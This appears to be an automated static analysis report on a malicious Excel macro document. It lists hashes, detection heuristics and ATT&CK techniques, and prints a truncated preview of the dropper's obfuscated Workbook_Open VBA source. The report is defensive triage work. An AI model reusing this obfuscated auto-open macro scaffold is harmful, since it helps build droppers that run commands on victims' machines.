Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 be9aaa5455ffb830…

MALICIOUS

Office (OOXML)

26.4 KB Created: 2018-10-24 22:17:14 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2019-03-18
MD5: f2bf5249e43cebdd5abf0a519ed0604f SHA-1: 6352fa41e0a15c01ac48923e7719e35cb30b2b76 SHA-256: be9aaa5455ffb830a10bec777891a6bd7d05f5a05274c60f556d239170d5b494
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file contains VBA macros, specifically a Workbook_Open macro that utilizes the Shell() function. This indicates the macro is designed to execute arbitrary commands upon opening the document. The presence of a 'Doc.Dropper.Agent' ClamAV detection further supports its role as a dropper for additional malware. No specific URLs or network indicators were extracted, but the technique strongly suggests a payload download and execution.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-7144840-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7144840-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 13778 bytes
SHA-256: d7d6e76841b32a184d9eec52a899e6486339757ecd4f021ec6718a6bf231c69d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
TavdyF5uxeidRpM.U9ZuNu9chuFnnc9npjPr
While 6 = 1165
Dim eMlhswFNCfZKN7f2v1jsvySf_ZC8OkbKFCUGV2 As Variant
Wend
Dim BamtYBS5Xq6F1x_ As Integer
While 18 = 6057
Dim f5o3_cRtG8ZCNDJjXe4yH_BXPLHAUAHsmKjGoMQXrpeu8 As Variant
Wend
Dim zLEfj791Z3 As Integer
While 1 = 5948
Dim Pk1SPWExqXCbC4JMeEaiOZQGQxNchunSIMXkYDZQX7Pi As Variant
Wend
Dim BWHJUVa2Xz As Integer
While 21 = 2301
Dim myRsAbHkO5srRydixZnHIRHrE4nDGJSu5RjhQoB8HvpT As Variant
Wend
Dim yS_SouhALOoSpjm As Integer
While 11 = 7403
Dim FwDbDk8v9N5QGWp9Wkx2vyTWVkQgnmO2pA5J_Rkr1fE_sbYl As Variant
Wend
Dim fOQr1q1PapEaSY As Integer
While 7 = 8270
Dim GT8CjEae4D9_AOsOm3Kn_WTf_8InrXLIXZWtEp1RJAUMrv As Variant
Wend
Dim pkgKBKOnXs_ZBl As Integer

While 15 = 1092
Dim wvezyoi19H7A2c9BFwMQhEeVA3tAnsnnNV As Variant
Wend
Dim VNzV3EEthCD As Integer
While 21 = 4438
Dim IWIYq2lwSWqOHy65gKNcQueEtJt4FKx As Variant
Wend
Dim gbQzeik71Bz58o8 As Integer
While 3 = 1001
Dim qf7JggShuW1DoeGrpGiIwz9YT6NVaazfYvcL75mPL4eame6ZsRIvXeIzgfz As Variant
Wend
Dim kQ6ESgTm3B As Integer
While 5 = 2716
Dim utcR62Tfvy_xmGPCG3kmnY_B9PwJ3R1BXwgYQEi As Variant
Wend
Dim Pd_s_jbR7Cc As Integer
While 25 = 9831
Dim LsQWOTnaSn_Ilc87Yyj1tASSGmoDZe8 As Variant
Wend
Dim yGY_Ft_gKtz As Integer
While 10 = 3868
Dim v4KTWOBmCbVJrJY7OlnjAwpNALW1KXQWF4NXFv As Variant
Wend
Dim OYBvbdb7p4pv As Integer
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "TavdyF5uxeidRpM"
Dim zkXzNSvEWjS7eWbVkqd6_Gd81A3Bs5d3qrCQC2wfcNrBwpZb4nfn_X2qFY9LZtVb_ZNvTIRs48btXaJJjYFDXzxQzUJm2iEr2O7VZm As String
 Function s4fIy8L7SI1JZmJ8Dx5_zbUNgMTKvDecIYnV16_PJIb_g1UxSc228o(QAxZ_SojyMCLC5Ile8Zmz9n8EO7bNhE6pDHt1bE7iNEseVM_K2abxBFQVyTsVLUOGFe8uYuC1cDk34brB1OUFmGn61WBGViU2)
While 18 = 2510
Dim EWcrJEFXA_nl7MHamlO7R1ctPQNoiGin6Q_x2BtPc_j3 As Variant
Wend
Dim vpbsOJ5ZlN4sa3 As Integer
While 4 = 4158
Dim ax2d_pnHSij28bLPjtXegKz1Xreny4GjzYBPqW9 As Variant
Wend
Dim JFgGHoR77Y8S9B As Integer

 Dim Av8Znp3PzafwAXUasRo2LVXz3UIg4_J7qnZCAmiuJQszIUWSwWf8joLnVGfQeTUuOi_V7RY_r4p5lhpf8ysfgKVBZvo3FPOz58iiPAVd7ZOp8
While 7 = 7644
Dim WSN7_EPJ_RYZ9AhY5hKtLW9DpKEugN1iHgbEwSpQ As Variant
Wend
Dim q_FNrroQWfcX As Integer
While 4 = 8127
Dim FMx9SJOx9eltayPZhblk14CLPsT8exVAtab4sbulC2QJWUw2ZNs54 As Variant
Wend
Dim gLJkqiyQRJHj As Integer


   Dim qDoCoLXyVTe8WLJmUu4_QPdDAbQmuPbSeioBoiwLaMdjUPEyXeK9cedZikAL4uDE1KaxgG7u7qgCu3qsUbMODby_DNbDhjQpIXrIyPPOgY
While 2 = 7932
Dim VUq_p9h9k1y56bfP_ZF34NsFtJwuiEB As Variant
Wend
Dim vUvdDfmN4RgjSvv As Integer
While 20 = 4646
Dim mUuAEqcE_GliTdKvYdxBhH8asZKKiUmXT7gZ9g_SQNqVa7Rs As Variant
Wend
Dim reGEesLcWRQo As Integer
   
While 16 = 7903
Dim eQfscMMV7tw2dctRaj_vGabCMg3ktDBoNTx_r72Lr6u7rNjA93AwRd As Variant
Wend
Dim fDxce6Tlk3rFlIo As Integer
While 17 = 6688
Dim tjcrvDKoeS861lzBNVswtJNa62ES2NklYUNRfDfZTWRH As Variant
Wend
Dim f9b9uzbt3V4hU As Integer
 Set qDoCo
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 41984 bytes
SHA-256: a8cf1ac5f85928aadd229b1084447b0996bdf9e987e3a92af2ca992437a14982
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.